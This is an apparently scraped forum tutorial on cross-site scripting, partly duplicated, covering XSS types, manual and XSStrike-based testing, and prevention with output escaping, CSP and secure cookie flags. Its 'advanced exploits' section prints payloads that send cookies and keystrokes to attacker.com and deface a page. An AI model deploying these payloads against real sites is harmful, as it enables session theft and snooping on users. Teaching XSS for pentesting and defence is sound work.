Cross-Site Scripting (XSS) is one of the most common web vulnerabilities, affecting thousands of websites each year. If exploited, an attacker can steal user sessions, perform phishing attacks, or completely deface a website.
This guide will cover:
What XSS is and why it’s dangerous
The three main types of XSS attacks
How to detect and exploit XSS vulnerabilities
Best practices for securing web applications
Example of a vulnerable website:
Stored XSS (Persistent XSS)
The malicious script is permanently stored in the website’s database and executed every time a user visits the affected page. Commonly found in comment sections, user profiles, and forums.
Reflected XSS
The malicious script is included in a URL and executed when a victim clicks on a crafted link. This is often used in phishing attacks.
DOM-Based XSS
The vulnerability exists entirely on the client-side, manipulating the webpage’s Document Object Model (DOM) without interacting with the server.
Manual Testing for XSS:
Try injecting common payloads into input fields or URLs:
Using Burp Suite for XSS Detection:
1. Intercept traffic with Burp Suite.
2. Modify request parameters with XSS payloads.
3. Observe the responses for JavaScript execution.
Automating XSS Detection with XSStrike:
1. Session Hijacking via XSS
If cookies are not set with `HttpOnly`, an attacker can steal them:
2. Defacing a Website with XSS
3. Keylogging via XSS
1. Input Validation & Sanitization
Escape special characters before rendering:
2. Use Content Security Policy (CSP)
A strong CSP blocks inline scripts:
3. Secure Cookies
Set `HttpOnly` and `Secure` flags to protect sessions:
What’s the most interesting XSS vulnerability you’ve encountered? Let’s discuss below!
This guide will cover:




? What is Cross-Site Scripting (XSS)?
XSS occurs when a website improperly processes user input, allowing an attacker to inject and execute JavaScript in a victim’s browser.Example of a vulnerable website:
If a site does not sanitize input, an attacker can execute JavaScript using:html said:<p>Welcome, <b><?php echo $_GET['name']; ?></b></p>
If this results in a popup alert, the website is vulnerable.https://example.com/?name=<script>alert('XSS')</script>
?️ Types of XSS Attacks

The malicious script is permanently stored in the website’s database and executed every time a user visits the affected page. Commonly found in comment sections, user profiles, and forums.

The malicious script is included in a URL and executed when a victim clicks on a crafted link. This is often used in phishing attacks.

The vulnerability exists entirely on the client-side, manipulating the webpage’s Document Object Model (DOM) without interacting with the server.
? How to Find & Exploit XSS Vulnerabilities
Manual Testing for XSS:
Try injecting common payloads into input fields or URLs:
If the input is reflected back without sanitization, the site may be vulnerable.<script>alert('XSS')</script>
"><script>alert(1)</script>
'"><img src=x onerror=alert(1)>
Using Burp Suite for XSS Detection:
1. Intercept traffic with Burp Suite.
2. Modify request parameters with XSS payloads.
3. Observe the responses for JavaScript execution.
Automating XSS Detection with XSStrike:
XSStrike automatically detects and exploits XSS vulnerabilities.bash said:git clone https://github.com/s0md3v/XSStrike.git
cd XSStrike
python3 xsstrike.py -u "https://target.com/search.php?q=test"
? Advanced XSS Exploits
1. Session Hijacking via XSS
If cookies are not set with `HttpOnly`, an attacker can steal them:
javascript said:<script>document.location='https://attacker.com/steal.php?cookie='+document.cookie;</script>
2. Defacing a Website with XSS
javascript said:<script>document.body.innerHTML = '<h1>Hacked</h1>';</script>
3. Keylogging via XSS
javascript said:<script>
document.onkeypress = function(e) {
fetch('https://attacker.com/logger.php?key='+e.key);
};
</script>
?️ How to Prevent XSS Attacks

Escape special characters before rendering:
php said:echo htmlspecialchars($user_input, ENT_QUOTES, 'UTF-8');

A strong CSP blocks inline scripts:
http said:Content-Security-Policy: default-src 'self'; script-src 'self'

Set `HttpOnly` and `Secure` flags to protect sessions:
http said:Set-Cookie: session=xyz; HttpOnly; Secure
? Conclusion
Cross-Site Scripting is one of the most exploited web vulnerabilities. Pentesters should know how to detect and exploit XSS, while developers must implement strict input validation and security measures.What’s the most interesting XSS vulnerability you’ve encountered? Let’s discuss below!